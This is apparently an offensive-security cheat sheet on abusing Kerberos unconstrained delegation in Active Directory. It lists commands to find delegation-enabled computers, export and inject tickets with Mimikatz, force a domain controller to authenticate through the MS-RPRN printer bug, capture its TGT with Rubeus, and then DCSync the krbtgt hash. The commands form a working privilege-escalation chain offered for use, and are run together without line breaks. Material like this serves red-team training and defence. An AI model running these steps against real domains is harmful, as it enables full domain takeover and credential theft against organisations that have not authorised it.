Introduction
- When set for a particular service account, unconstrained delegation allows delegation to any service to any resource on the domain as a user.
- When unconstrained delegation is enabled, the DC places user’s TGT inside TGS. When it is presented to the server, the TGT is extracted from TGS and stored in LSASS. This way the server can reuse the user’s TGT to access any other resource as the user.
- This could be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Domain Admin connects to that machine.
Get-DomainComputer -UnConstrainedGet-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-ADUser -Filter {TrustedForDelegation -eq $true}After compromising the server where Unconstrained delegation is enabled, we must trick or wait for a domain admin to connect a service on the application server.
Invoke-MimiKatz -Command '"sekurlsa::tickets /export"'Invoke-MimiKatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'Printer Bug
- This is a method to trick a high privilege user to connect to a machine with Unconstrained Delegation.
- A feature of MS-RPRN (Microsoft-Print System Remote Control) which allows any domain user (Authenticated User) can force any machine (running the Spooler service) to connect to a second machine of the domain user’s choice.
Rubeus.exe monitor /interval:5 /nowrapMS-RPRN.exe \\domain-controller-fqdn \\unconstrained-delegation-enabled-fqdnIn Rubeus, the base64 TGT will appear
Rubeus.exe ptt /ticket:<base64_tgt>Invoke-MimiKatz -Command '"lsadump::dcsync /user:domain\krbtgt"'This attack can work across forests if TGT delegation is enabled.